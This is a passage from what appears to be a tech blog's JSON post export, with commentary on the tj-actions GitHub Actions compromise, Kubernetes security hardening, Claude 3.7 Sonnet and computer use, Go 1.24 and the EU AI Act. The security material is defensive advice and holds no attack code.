The compromised versions were live for a window during which any repository using the action would have its secrets exposed in build logs.\nThe attack vector likely started through a compromise of the related reviewdog/action-setup action, which tj-actions had as a dependency. This cascading dependency compromise is exactly what makes supply chain attacks so devastating — you don\u0026rsquo;t just need to trust the action you\u0026rsquo;re using, you need to trust everything it depends on, and everything those dependencies depend on, all the way down.\nThe Fundamental Problem with GitHub Actions Security # Here\u0026rsquo;s the uncomfortable truth: the way most teams use GitHub Actions is inherently risky. The common pattern of referencing actions by mutable tag names means you\u0026rsquo;re running code that can change underneath you without any notification or approval process.\nConsider this typical workflow snippet:\n- uses: tj-actions/changed-files@v45 That @v45 tag can be re-pointed to a completely different commit at any time. Unlike a pinned dependency in package-lock.json or go.sum, there\u0026rsquo;s no integrity verification happening here by default. You\u0026rsquo;re essentially giving the action maintainer — or anyone who compromises their account — the ability to run arbitrary code in your CI environment with access to all your repository secrets.\nThe secure alternative is to pin actions to specific commit SHAs:\n- uses: tj-actions/changed-files@abc123def456789... But almost nobody does this because it\u0026rsquo;s inconvenient. You lose automatic patch updates, and the workflow files become harder to read. This is a classic security-versus-usability tension, and usability has been winning.\nBroader Supply Chain Lessons # This incident is part of a pattern we\u0026rsquo;ve been seeing across the software ecosystem. These attacks follow the same supply chain compromise patterns we\u0026rsquo;ve documented in npm incidents and other package ecosystems.
Each one demonstrates that build and deployment infrastructure is a high-value target.\nWhat makes CI/CD supply chain attacks particularly dangerous is the blast radius. A single compromised action or dependency can affect thousands of organisations simultaneously. And CI environments typically have elevated privileges: deployment credentials, cloud provider tokens, package registry keys, database passwords. It\u0026rsquo;s a treasure trove.\nThe industry has been making progress on supply chain security — SLSA frameworks, Sigstore for signing, SBOM requirements — but the CI/CD pipeline remains a weak link. The tooling for verifying the integrity of CI components lags far behind what we have for application dependencies.\nWhat You Should Do Right Now # First, audit your GitHub Actions workflows. Search your repositories for any reference to tj-actions/changed-files and update or remove it. Check the GitHub advisory for the specific affected versions.\nSecond, pin your actions to commit SHAs, at least for actions that run with access to secrets. Yes, it\u0026rsquo;s more maintenance. Use Dependabot or Renovate to automate SHA updates — they can propose PRs when new versions are released, giving you a review step.\nThird, restrict secret access. Use GitHub\u0026rsquo;s environment protection rules and required reviewers to limit which workflows can access production secrets. Not every PR build needs your deployment credentials.\nFourth, monitor your CI output. Tools like StepSecurity\u0026rsquo;s Harden-Runner can detect anomalous network activity from your CI runners. If a build step is making unexpected outbound connections, you want to know about it.\nFinally, consider using only first-party or verified actions where possible. GitHub\u0026rsquo;s own actions (actions/checkout, actions/setup-node, etc.) have a higher security bar. 
For everything else, evaluate whether the convenience is worth the risk — sometimes a few lines of shell script in your workflow file are safer than importing a third-party action.\nMy Take # I\u0026rsquo;ve been doing DevOps since before it had a name, and the speed at which CI/CD pipelines have become the new \u0026ldquo;soft underbelly\u0026rdquo; of software organisations still catches me off guard. This echoes the patterns we see in network infrastructure compromises where perimeter systems become the critical entry point. We spent years hardening our production environments, implementing zero-trust networking, and encrypting everything in transit and at rest. Meanwhile, our build systems are pulling in unverified code from the internet and running it with our most sensitive credentials.\nThe tj-actions incident should be a wake-up call, but I\u0026rsquo;ve seen enough \u0026ldquo;wake-up calls\u0026rdquo; in this industry to know that most teams won\u0026rsquo;t change their practices until it directly affects them. If you\u0026rsquo;re reading this, don\u0026rsquo;t wait for that to happen. Spend an afternoon auditing your CI pipelines. It\u0026rsquo;s the highest-impact security work you can do this week.\nThis is part of my Security in Practice series, covering real-world security incidents and their implications for development teams.\n","date":"13 March 2025","externalUrl":null,"permalink":"/posts/250313-github-actions-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A compromised GitHub Action exposed secrets from thousands of repositories, highlighting how CI/CD pipelines have become prime targets for supply chain attacks.","title":"The tj-actions Supply Chain Attack — Why Your CI/CD Pipeline Is an Attack Surface","type":"posts"},{"content":"Anthropic just released Claude 3.7 Sonnet, and after spending a few days with it, I\u0026rsquo;m genuinely impressed.
This isn\u0026rsquo;t just an incremental model bump — the introduction of \u0026ldquo;extended thinking\u0026rdquo; represents a fundamentally different approach to how LLMs tackle complex problems. For developers using AI as a daily tool, this matters.\nWhat Extended Thinking Actually Does # The concept is deceptively simple: before generating its final response, Claude 3.7 Sonnet can now engage in an explicit chain-of-thought reasoning process. You can see the model\u0026rsquo;s thinking unfold in real time — working through the logic, considering edge cases, and revising its approach before committing to an answer.\nThis is different from the implicit reasoning that all transformer models do. Extended thinking makes the reasoning process transparent and, crucially, longer. The model can spend significantly more compute on actually thinking through a problem rather than pattern-matching to the most likely token sequence.\nIn the Anthropic announcement, they highlight substantial improvements on coding benchmarks — SWE-bench scores jumped meaningfully compared to Claude 3.5 Sonnet. This evolution follows broader advances in foundation model capabilities, particularly in reasoning depth and accuracy. But benchmarks only tell part of the story.\nReal-World Impact on Coding Workflows # Where I\u0026rsquo;ve noticed the biggest difference is in multi-step reasoning tasks. Ask Claude 3.7 to debug a complex async race condition, and you can watch it systematically work through the execution flow, identify the timing window, and propose a fix that actually addresses the root cause rather than papering over symptoms.\nThe extended thinking also shines in architectural discussions. 
I threw a moderately complex microservices migration question at it — decomposing a monolithic Node.js application with shared state — and the thinking process revealed it was genuinely considering trade-offs between consistency models, not just regurgitating the \u0026ldquo;use event sourcing\u0026rdquo; playbook that earlier models would default to.\nFor code review, the improvement is noticeable. The model catches subtle issues that previous versions would miss: potential deadlocks in concurrent code, edge cases in error handling paths, and even performance implications of certain patterns. This kind of automated code review capability intersects with governance requirements around AI system documentation. It\u0026rsquo;s not infallible by any means, but the hit rate on useful observations has gone up considerably.\nThe Hybrid Model Approach # What\u0026rsquo;s interesting architecturally is that Claude 3.7 Sonnet is what Anthropic calls a \u0026ldquo;hybrid\u0026rdquo; model — you can use it with or without extended thinking enabled. This is a pragmatic design choice. Not every query needs deep reasoning. When you\u0026rsquo;re asking for a quick code snippet or a straightforward refactoring, the overhead of extended thinking would be wasteful.\nThe API lets you control a budget_tokens parameter that caps how much thinking the model can do. This is smart from a cost perspective — you\u0026rsquo;re essentially paying for compute time proportional to reasoning depth. For CI/CD integrations where you might use an LLM for automated code review, being able to dial this up or down based on the complexity of the changeset makes the economics more viable.\nI\u0026rsquo;ve been experimenting with setting different thinking budgets for different tasks: low budget for docstring generation and simple refactors, high budget for security review and architecture decisions. 
It works well in practice.\nWhat This Means for the AI Coding Tool Landscape # The extended thinking approach puts pressure on other AI coding tools to evolve beyond simple autocomplete and chat interfaces. GitHub Copilot, Cursor, and others have been primarily optimized for speed — getting code suggestions in front of you as quickly as possible. Claude 3.7 Sonnet suggests there\u0026rsquo;s a complementary mode where you actually want the AI to slow down and think harder.\nI suspect we\u0026rsquo;ll see more tools start offering a \u0026ldquo;think deeply\u0026rdquo; mode for complex tasks. This is similar to how newer IDE tools like Copilot\u0026rsquo;s agent mode are adding more sophisticated AI reasoning. The user experience challenge is making it clear when deep thinking adds value versus when it\u0026rsquo;s just adding latency.\nThere\u0026rsquo;s also an interesting transparency angle. Being able to see the model\u0026rsquo;s reasoning process makes it easier to evaluate whether to trust its output. When I can see Claude working through the logic of why a particular database index would help with a specific query pattern, I can assess whether its reasoning is sound. That\u0026rsquo;s harder to do with a model that just produces an answer.\nMy Take # After three decades of writing software, I\u0026rsquo;ve seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that didn\u0026rsquo;t. But extended thinking feels like it addresses a genuine limitation that\u0026rsquo;s been holding back AI-assisted development: the inability of models to engage in sustained, multi-step reasoning.\nIs Claude 3.7 Sonnet going to replace senior developers? Absolutely not. The thinking process, while impressive, still occasionally goes down unproductive paths or makes assumptions that a domain expert would catch immediately. But as a pair programming partner that can actually reason through problems rather than just pattern-match? 
It\u0026rsquo;s the best I\u0026rsquo;ve used.\nThe competition between Anthropic, OpenAI, and Google in this space continues to benefit developers enormously. Each release pushes the boundary of what\u0026rsquo;s useful, and Claude 3.7 Sonnet has definitely raised the bar. I\u0026rsquo;m curious to see how the other players respond — reasoning capabilities seem like they\u0026rsquo;ll be the differentiator for the next phase of AI development tools.\nThis is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering in practice.\n","date":"6 March 2025","externalUrl":null,"permalink":"/posts/250306-claude-3-7-sonnet-extended-thinking/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s Claude 3.7 Sonnet introduces extended thinking, letting the model reason step-by-step before responding — and the implications for developer workflows are significant.","title":"Claude 3.7 Sonnet — Extended Thinking Changes the Game for AI-Assisted Development","type":"posts"},{"content":"The container ecosystem has been on an interesting trajectory lately. On one hand, Kubernetes continues its march toward maturity with each release hardening security defaults and graduating long-pending features. 
On the other hand, CISA and other security bodies have been publishing increasingly specific guidance about container security, reflecting both the widespread adoption and the persistent gaps in how organizations secure their containerized workloads.\nThis convergence — better tooling meeting higher expectations — is worth examining for anyone running production Kubernetes clusters, which at this point is most of us in the infrastructure space.\nThe State of Kubernetes Security in 2025 # Kubernetes has come a long way from the early days when the default configuration was essentially \u0026ldquo;trust everything.\u0026rdquo; Recent releases have been systematically addressing security concerns that practitioners have been working around for years.\nPod Security Standards, which replaced the deprecated Pod Security Policies, have been stable since 1.25 and are now widely adopted. The three levels — Privileged, Baseline, and Restricted — provide a clear framework for what pods should and shouldn\u0026rsquo;t be allowed to do. In practice, I\u0026rsquo;m seeing more organizations enforce the Restricted profile by default, with explicit exceptions for workloads that genuinely need elevated privileges.\nUser namespaces for pods, which allow mapping container root to an unprivileged user on the host, have been progressing through the beta stages. This is one of those features that sounds obscure but has significant security implications — it means that even if an attacker escapes the container, they land as an unprivileged user on the host rather than as root.\nThe ongoing work on Structured Authentication Configuration is also worth noting. 
Moving authentication configuration out of command-line flags and into structured, auditable configuration files is the kind of operational improvement that makes security teams sleep better at night.\nCISA\u0026rsquo;s Container Hardening Guidance # CISA has been updating its guidance on securing containerized environments, and the latest recommendations reflect a more sophisticated understanding of the container threat model than earlier versions. Key areas they\u0026rsquo;re emphasizing:\nImage supply chain security: Signing container images and verifying signatures before deployment. Tools like Sigstore\u0026rsquo;s Cosign have made this significantly easier, and the integration with Kubernetes admission controllers means you can enforce signature verification at the cluster level. If you\u0026rsquo;re not signing your images yet, this should be near the top of your priority list.\nRuntime security monitoring: Static analysis and scanning at build time catches known vulnerabilities, but runtime monitoring catches actual exploitation. Tools like Falco, Tetragon, and the commercial offerings from the likes of Sysdig and Aqua Security have matured considerably. The common pattern is using eBPF-based monitoring to detect anomalous system calls, network connections, and file access patterns without the performance overhead of traditional approaches.\nNetwork policy enforcement: The default Kubernetes networking model allows any pod to communicate with any other pod in the cluster. Network policies exist to restrict this, but adoption remains patchy. CISA\u0026rsquo;s guidance specifically calls out the importance of implementing least-privilege network policies — every pod should only be able to reach the services it actually needs.\nSecrets management: Kubernetes Secrets, stored as base64-encoded values in etcd, have always been a known weak point. 
The guidance pushes organizations toward external secrets management solutions — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault — with the Kubernetes Secrets Store CSI driver providing a clean integration path. Encrypting Secrets at rest in etcd using KMS providers is the minimum bar.\nWhat Platform Teams Should Be Doing # Based on the current state of tooling and threat landscape, here\u0026rsquo;s what I\u0026rsquo;d recommend for platform teams managing Kubernetes in production:\nEnforce Pod Security Standards at the namespace level. Start with the Baseline profile and work toward Restricted. Use audit mode first to understand the impact before enforcing.\nImplement image signing and verification. The Sigstore ecosystem has made this accessible. Integrate Cosign into your CI/CD pipeline and use a policy engine like Kyverno or OPA Gatekeeper to enforce signature verification on admission.\nDeploy runtime security monitoring. At minimum, use Falco with a curated rule set. Monitor for unexpected process execution, network connections, and file modifications in your containers. Alert on anomalies, don\u0026rsquo;t just log them.\nAudit your network policies. Use tools like kubectl plugins or commercial solutions to visualize actual network traffic patterns, then write policies that match. Start with critical namespaces and expand outward.\nRotate credentials and review RBAC regularly. Service account tokens, kubeconfig files, and RBAC bindings tend to accumulate over time. Implement automated rotation and periodic reviews. The principle of least privilege is easy to state and hard to maintain without tooling.\nThe Supply Chain Angle # Container security doesn\u0026rsquo;t start at deployment — it starts at the Dockerfile. 
The recent focus on software supply chain security, as we\u0026rsquo;ve seen with CI/CD and GitHub Actions compromises, has put container build pipelines under increased scrutiny.\nUsing minimal base images (distroless, Alpine, or scratch), pinning dependencies to specific versions and hashes, scanning for vulnerabilities at build time, and generating SBOMs (Software Bills of Materials) are all practices that should be standard by now. The tooling is there (Trivy and Grype for scanning, Syft for SBOM generation), but consistent adoption remains a challenge in many organizations.\nOne pattern I\u0026rsquo;ve been advocating for is \u0026ldquo;golden image\u0026rdquo; pipelines: centrally maintained, pre-hardened base images that application teams build upon. This approach pairs well with containerized infrastructure management using Docker and infrastructure-as-code practices. Golden images give the security team a single place to enforce standards while giving developers a fast, compliant starting point. It\u0026rsquo;s not a new idea, but the tooling to implement it well has improved significantly.\nMy Take # The container security story in 2025 is fundamentally different from where it was even two years ago. The tools are better, the defaults are more secure, and the guidance from security organizations is more practical and specific. The gap isn\u0026rsquo;t in tooling anymore; it\u0026rsquo;s in adoption and operational discipline.\nWhat I find encouraging is the shift from \u0026ldquo;security as a gate\u0026rdquo; to \u0026ldquo;security as a platform feature.\u0026rdquo; When your Kubernetes cluster enforces pod security standards, verifies image signatures, and monitors runtime behavior by default, security becomes something the platform provides rather than something each team has to implement independently. 
This platform-centric approach aligns with how modern infrastructure is increasingly built with declarative, versioned configurations.\nWe\u0026rsquo;re not there yet — most clusters I encounter in the wild still have significant gaps — but the trajectory is clearly positive. The investment in getting this right is worth it. A compromised container in a well-hardened cluster is a contained incident. A compromised container in an unhardened cluster is a potential catastrophe.\nIf your platform team hasn\u0026rsquo;t done a security review of your Kubernetes setup recently, now\u0026rsquo;s a good time. The threat landscape hasn\u0026rsquo;t gotten friendlier, but at least the tools to defend against it have gotten better.\n","date":"27 February 2025","externalUrl":null,"permalink":"/posts/250227-kubernetes-container-security-hardening/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With Kubernetes pushing security features to GA and CISA issuing container hardening guidance, the container ecosystem is growing up on security. Here’s what matters for platform teams.","title":"Kubernetes 1.33 and the Container Security Hardening Push","type":"posts"},{"content":"The AI agent space has been buzzing with activity, and one development that keeps coming up in my conversations with other developers is Anthropic\u0026rsquo;s \u0026ldquo;computer use\u0026rdquo; capability for Claude. While it was initially announced in beta back in October, the real-world adoption and experimentation has been accelerating through early 2025. 
The idea is deceptively simple: give an AI model the ability to see a screen, move a mouse, and type on a keyboard — essentially letting it operate a computer the way a human would.\nHaving spent a few weeks experimenting with computer use in various automation scenarios, I wanted to share some thoughts on where this technology stands, where it\u0026rsquo;s genuinely useful, and where the hype outpaces reality.\nHow Computer Use Actually Works # The technical approach is straightforward in concept. Claude receives screenshots of the desktop, reasons about what it sees, and issues commands — mouse clicks at specific coordinates, keyboard input, scrolling. It\u0026rsquo;s essentially a vision-language model controlling a computer through the same interface a VNC user would.\nThe implementation typically involves running a containerized desktop environment (Anthropic provides Docker images for this), connecting Claude to it via their API, and defining the task you want accomplished. The model takes screenshots at each step, decides what to do next, and iterates until the task is complete or it gets stuck.\nWhat\u0026rsquo;s remarkable is that this works without any application-specific integration. Claude doesn\u0026rsquo;t need an API for the application it\u0026rsquo;s controlling — it reads the screen and interacts with the UI. This means it can theoretically work with any desktop application, legacy system, or web interface, including ones that have no API at all.\nWhere It Actually Shines # After experimenting with various use cases, I\u0026rsquo;ve found computer use most compelling in a few specific scenarios:\nLegacy system automation: Many organizations have critical business processes running through old desktop applications or web portals that were built before APIs were standard practice. 
Writing a traditional automation script for these systems is painful — you\u0026rsquo;re dealing with fragile screen scraping, COM automation, or reverse-engineering undocumented protocols. Computer use offers a higher-level abstraction: describe what you want done, and the AI figures out how to navigate the interface.\nTesting workflows: Using computer use for end-to-end testing of complex web applications is intriguing. Rather than maintaining brittle Selenium scripts that break every time the UI changes, you can describe test scenarios in natural language. \u0026ldquo;Log in, navigate to the settings page, change the notification preferences, and verify the confirmation message.\u0026rdquo; The AI handles the implementation details.\nData entry and extraction: For tasks that involve copying data between systems — pulling information from one application and entering it into another — computer use eliminates the need for custom integration code. It\u0026rsquo;s not the most efficient approach, but for low-volume, high-variety tasks, it\u0026rsquo;s remarkably practical.\nThe Limitations Are Real # Let me temper the enthusiasm with some honest assessment of the current limitations.\nSpeed: Computer use is slow. Each interaction cycle involves taking a screenshot, sending it to the API, waiting for the model to reason about it, and executing the action. A task that a human could complete in 30 seconds might take several minutes. For high-volume automation, traditional scripted approaches are still far superior.\nReliability: The model makes mistakes. It misclicks, misreads text, gets confused by pop-ups or unexpected dialog boxes, and sometimes enters a loop of incorrect actions. In my testing, I\u0026rsquo;d estimate about a 70-80% success rate on moderately complex multi-step tasks. 
That\u0026rsquo;s impressive for an AI system but inadequate for production automation without human oversight.\nCost: Each step involves an API call with image input, which adds up quickly. A complex workflow might involve dozens of steps, each costing a few cents. For frequent automation tasks, the economics don\u0026rsquo;t currently favor computer use over traditional scripting.\nSecurity implications: Giving an AI model control over a computer raises obvious security concerns. The model needs access to whatever the automated application can access, and a misguided action could have real consequences. Sandboxing and careful permission scoping are essential.\nThe Broader Agent Landscape # Computer use is part of a wider trend toward AI agents — systems that don\u0026rsquo;t just generate text but take actions in the real world. This aligns with broader industry moves toward agent orchestration platforms. OpenAI has been pushing its own agent frameworks, Google\u0026rsquo;s Gemini has similar capabilities in development, and the open-source community has projects like Open Interpreter that offer comparable functionality.\nWhat\u0026rsquo;s emerging is a spectrum of agent capabilities. At one end, you have tool-using models that call APIs and functions — relatively structured and predictable. At the other end, you have computer use, where the AI interacts with arbitrary interfaces through vision and motor control — flexible but less reliable.\nThe sweet spot for most production use cases is probably somewhere in the middle: agents that use structured tools (APIs, functions, databases) for core functionality, with computer use as a fallback for systems that don\u0026rsquo;t have programmatic interfaces.\nMy Take # I see computer use as a genuinely important capability, but one that\u0026rsquo;s currently better suited for prototyping, occasional automation, and handling edge cases than for production-scale operations. 
The technology will improve — models will get faster, more accurate, and cheaper — but the fundamental overhead of the screenshot-reason-act loop means it will likely remain slower than purpose-built integrations.\nWhere I\u0026rsquo;m most excited is the democratization of automation. Today, automating a workflow across multiple applications requires significant programming skill. Computer use lowers that barrier dramatically. A domain expert who can describe a process in plain language can now automate it, at least for personal productivity scenarios.\nFor us as developers, the implications are interesting. We should be thinking about how our applications will be used by AI agents — both through APIs (which should be the primary interface) and through UIs that agents can navigate. Accessible, well-structured interfaces aren\u0026rsquo;t just good for human users; they\u0026rsquo;re increasingly good for AI users too. As governance frameworks like the EU AI Act mature, transparent agent behavior and auditability will become compliance requirements, not just best practices.\nThe agent era is coming, but it\u0026rsquo;s coming gradually, not as a sudden revolution. Computer use is one piece of that puzzle — a powerful but imperfect tool that\u0026rsquo;s worth understanding and experimenting with, even if it\u0026rsquo;s not ready to replace your CI/CD pipeline just yet.\n","date":"20 February 2025","externalUrl":null,"permalink":"/posts/250220-anthropic-computer-use-ai-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic’s computer use capability lets Claude interact with desktop applications like a human. 
What does this mean for automation, testing, and the future of AI agents?","title":"Claude 3.5 Gets a Computer — Anthropic's 'Computer Use' and the Future of AI Agents","type":"posts"},{"content":"Go 1.24 landed this week, and while it\u0026rsquo;s not the kind of release that generates breathless headlines, it\u0026rsquo;s the kind that makes working Go developers quietly satisfied. The headline features — generic type aliases, a new tool directive in go.mod, and the switch to Swiss Tables for the built-in map implementation — are all practical improvements that reflect Go\u0026rsquo;s continuing maturity as a language.\nI\u0026rsquo;ve been writing Go on and off since the 1.4 days, and what consistently impresses me about the project is its discipline. Go\u0026rsquo;s evolution since early releases like 1.14 shows a consistent commitment to practical improvements over chasing trends. In a world where languages compete on feature count, Go keeps saying no to things, and the things it says yes to tend to be well-considered and immediately useful. This contrasts with the broader language evolution in Python and Rust, where feature complexity is increasing while Go remains focused.\nGeneric Type Aliases: Finishing What 1.18 Started # When Go introduced generics in version 1.18 back in 2022, it was a milestone — and also deliberately incomplete. The team took the pragmatic approach of shipping the core feature and iterating. One gap was that type aliases couldn\u0026rsquo;t be parameterized. In Go 1.24, that\u0026rsquo;s fixed. This iterative improvement pattern aligns with how language ecosystems have matured to balance innovation with stability.\nYou can now write:\ntype Set[T comparable] = map[T]struct{} This might seem like a small thing, but it matters for library authors who want to provide clean, ergonomic APIs while using generic types internally. 
It also helps with gradual refactoring: you can introduce a type alias to ease migration between type definitions without breaking downstream consumers.\nThe broader story here is that Go\u0026rsquo;s generics are maturing. The initial release was intentionally conservative, and each subsequent release has filled in gaps based on real-world usage feedback. This incremental approach has avoided the \u0026ldquo;generics complexity explosion\u0026rdquo; that some feared. Go generics remain simpler than those in Rust, which continues to gain momentum in systems programming, and that feels intentional and correct for Go\u0026rsquo;s target audience.\nThe tool Directive: Acknowledging Developer Tooling Reality # One of the most pragmatic additions in 1.24 is the new tool directive in go.mod. This lets you declare Go-based tool dependencies directly in your module definition:\ntool ( golang.org/x/tools/cmd/stringer github.com/sqlc-dev/sqlc/cmd/sqlc ) Previously, managing tool dependencies in Go projects was awkward. The community had converged on a tools.go pattern (a file with blank imports behind a build tag) that worked but felt like a hack. The new tool directive makes this a first-class concept.\nThis is the kind of change I love about Go\u0026rsquo;s evolution. The team observed what the community was doing, recognized it as a legitimate need, and built a clean solution into the language\u0026rsquo;s tooling. No fanfare, no RFC drama, just a sensible improvement that eliminates a paper cut.\nThe go tool command now lets you run these tools directly without manual installation, pulling the right version from the module graph. Combined with the existing go generate workflow, this makes reproducible code generation significantly cleaner.\nSwiss Tables: Performance Where It Counts # Under the hood, Go 1.24 replaces the built-in map implementation with one based on Swiss Tables, a hash table design that originated in Google\u0026rsquo;s Abseil C++ library. 
The new implementation offers meaningful performance improvements, particularly for maps with many entries and for operations that involve iteration during modification.\nFor most applications, this is a \u0026ldquo;free performance upgrade\u0026rdquo; — your existing code gets faster without any changes. Benchmarks from the Go team show improvements ranging from modest (single-digit percentage) for small maps to substantial (30%+) for larger ones, with memory usage also improving.\nWhat\u0026rsquo;s noteworthy is how this change was made. The built-in map is one of Go\u0026rsquo;s most fundamental data structures, and swapping its implementation is a high-risk change. The team ran extensive compatibility testing, maintained the existing behavioral guarantees (including deliberate map iteration randomization), and provided an escape hatch via GOEXPERIMENT=noswissmap for anyone who encounters issues.\nOther Highlights Worth Noting # A few other changes caught my eye:\nImproved finalizer semantics: The new runtime.AddCleanup function provides a more robust alternative to runtime.SetFinalizer, addressing several long-standing gotchas around finalizer ordering and object resurrection. If you\u0026rsquo;ve ever been bitten by finalizer-related bugs (and who hasn\u0026rsquo;t?), this is worth exploring.\nos.Root for path traversal protection: A new os.Root type restricts file system operations to a specific directory tree, preventing path traversal attacks. This is particularly valuable for server applications that handle user-provided file paths — a common source of security vulnerabilities.\nFIPS 140-3 compliance: Go 1.24 includes a mechanism for building applications with FIPS 140-3 compliant cryptography, which is increasingly required for government and regulated industry deployments. 
This has been a gap that pushed some organizations toward CGo-based solutions, so having it natively is significant.\nMy Take # Go 1.24 is a \u0026ldquo;boring\u0026rdquo; release in the best possible sense. There\u0026rsquo;s no paradigm shift, no controversial new feature, no \u0026ldquo;you need to rewrite your code\u0026rdquo; moment. Instead, it\u0026rsquo;s a collection of thoughtful improvements that make the language and its tooling better at the things Go is already good at.\nThis is what language maturity looks like. The exciting phase of introducing generics is giving way to the arguably more important phase of making generics work well in practice. The tooling improvements reflect a team that uses Go daily and cares about the developer experience in concrete ways.\nFor teams considering Go for new projects, the message is clear: this is a language with a long-term vision, a disciplined evolution process, and a strong commitment to backward compatibility. Your Go 1.18 code runs on Go 1.24 without changes, and it probably runs faster.\nIn an ecosystem where JavaScript runtime competition is reshaping developer tooling choices and Python\u0026rsquo;s packaging story remains a source of perpetual frustration, there\u0026rsquo;s something deeply refreshing about Go\u0026rsquo;s approach. Not every language needs to move fast and break things. Sometimes the best thing a language can do is move thoughtfully and fix things.\nI\u0026rsquo;ll be upgrading my projects over the coming weeks. The Swiss Tables improvement alone makes it worthwhile, and the tool directive will let me finally clean up those tools.go files that have always felt slightly embarrassing.\n","date":"13 February 2025","externalUrl":null,"permalink":"/posts/250213-go-124-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Go 1.24 brings generic type aliases, improved tool management, and Swiss Tables. 
A look at how Go keeps evolving without losing its identity.","title":"Go 1.24 Released — Generics Maturity and the Evolution of a Pragmatic Language","type":"posts"},{"content":"On February 2nd, the first batch of provisions from the EU AI Act became enforceable. After years of legislative wrangling, the world\u0026rsquo;s most comprehensive AI regulation is no longer theoretical — it\u0026rsquo;s law. And if you\u0026rsquo;re a developer building anything that touches AI, it\u0026rsquo;s time to pay attention, regardless of where you\u0026rsquo;re based.\nI\u0026rsquo;ve been following this legislation since its early drafts in 2021, and what strikes me now is how quickly we\u0026rsquo;ve moved from \u0026ldquo;this will never pass\u0026rdquo; to \u0026ldquo;this is enforceable and there are fines.\u0026rdquo; The gap between regulatory intent and developer awareness remains uncomfortably wide.\nWhat Just Kicked In # The EU AI Act uses a phased enforcement approach. The provisions that became applicable on February 2nd, 2025 focus on the most critical areas:\nProhibited AI practices are now banned. This includes social scoring systems by public authorities, real-time remote biometric identification in public spaces (with narrow exceptions for law enforcement), and AI systems that exploit vulnerabilities of specific groups. It also bans emotion recognition in workplaces and educational institutions, and the creation of facial recognition databases through untargeted scraping.\nAI literacy requirements are now in force. Organizations deploying AI systems must ensure that their staff have sufficient understanding of AI to operate these systems responsibly. 
This is vaguer than the technical provisions but signals a clear expectation that \u0026ldquo;we didn\u0026rsquo;t understand what the AI was doing\u0026rdquo; won\u0026rsquo;t fly as an excuse.\nThese are the \u0026ldquo;don\u0026rsquo;t be evil\u0026rdquo; provisions — the low-hanging fruit that most responsible developers wouldn\u0026rsquo;t engage in anyway. The more complex requirements around high-risk AI systems, general-purpose AI models, and transparency obligations phase in over the coming months and into 2026.\nThe Classification System Matters # The Act categorizes AI systems into risk tiers: unacceptable (banned), high-risk (heavily regulated), limited risk (transparency obligations), and minimal risk (largely unregulated). Understanding where your system falls is the first practical step.\nHigh-risk categories include AI used in critical infrastructure, education, employment, essential services, law enforcement, and immigration. If your AI system influences decisions in these domains, you\u0026rsquo;re looking at requirements around risk management, data governance, technical documentation, human oversight, accuracy, robustness, and cybersecurity.\nFor most of us building developer tools, content generation systems, or business automation, we\u0026rsquo;re likely in the limited or minimal risk categories. But the boundaries aren\u0026rsquo;t always obvious. A chatbot that provides general information? Minimal risk. A chatbot that provides medical or legal advice? Potentially high-risk. The classification depends on the use case, not the technology.\nGeneral-Purpose AI Model Obligations # This is where it gets particularly relevant for the current AI landscape. The Act includes specific provisions for general-purpose AI models (think GPT-4, Claude, Gemini, Llama) that apply to the model providers themselves. 
These include:\nMaintaining technical documentation Providing information to downstream deployers Complying with EU copyright law Publishing sufficiently detailed summaries of training data Models deemed to pose \u0026ldquo;systemic risk\u0026rdquo; — currently defined by a compute threshold of 10^25 FLOPs — face additional requirements including model evaluation, adversarial testing, incident reporting, and cybersecurity measures.\nFor developers using these models through APIs, the practical impact is indirect but real. Expect model providers to update their terms of service, potentially restrict certain use cases in the EU, and provide more detailed documentation about model capabilities and limitations. The compliance requirements are reshaping how AI platforms are built and deployed, as major vendors incorporate governance into their architecture. Some of this is already happening — OpenAI and Google have both been updating their compliance frameworks.\nWhat This Means Outside Europe # If you\u0026rsquo;re thinking \u0026ldquo;I\u0026rsquo;m not in the EU, this doesn\u0026rsquo;t apply to me\u0026rdquo; — not so fast. The Act applies to any AI system that is placed on the market in the EU or whose output is used in the EU. If you\u0026rsquo;re building a SaaS product with AI features and you have European customers, you\u0026rsquo;re in scope.\nThis is the \u0026ldquo;Brussels Effect\u0026rdquo; that we\u0026rsquo;ve seen with GDPR. European regulation tends to set a de facto global standard because it\u0026rsquo;s often easier for companies to build one compliant product than to maintain separate versions for different markets. 
I expect a similar dynamic to play out with AI regulation.\nThe US is taking a very different approach — the recent executive orders have focused more on promoting AI development than restricting it, and the Stargate infrastructure announcement from a couple of weeks ago underscores the current administration\u0026rsquo;s priority on AI acceleration. This regulatory divergence creates complexity for anyone operating across both markets.\nPractical Steps for Developer Teams # Based on my reading of the Act and conversations with colleagues navigating compliance, here\u0026rsquo;s what I\u0026rsquo;d recommend for development teams right now:\nAudit your AI usage: Map out where you\u0026rsquo;re using AI systems and how they influence decisions. You might be surprised how many AI touchpoints exist across your product.\nClassify your risk level: Use the Act\u0026rsquo;s framework to understand which tier your applications fall into. The EU AI Act Compliance Checker is a useful starting point.\nDocument everything: Technical documentation requirements are coming for high-risk systems. Start building the habit now — document your training data, model choices, evaluation metrics, and known limitations.\nReview your supply chain: If you\u0026rsquo;re using third-party AI models or services, understand your obligations as a \u0026ldquo;deployer\u0026rdquo; versus a \u0026ldquo;provider\u0026rdquo; under the Act. The responsibility allocation isn\u0026rsquo;t always intuitive.\nInvest in AI literacy: The literacy requirement applies now. Make sure your team understands not just how to use AI tools, but their limitations, biases, and appropriate use cases.\nMy Take # I have mixed feelings about the EU AI Act. On one hand, some form of regulation is clearly needed — the pace of AI deployment has outstripped our ability to understand its societal impact, and self-regulation hasn\u0026rsquo;t been sufficient. 
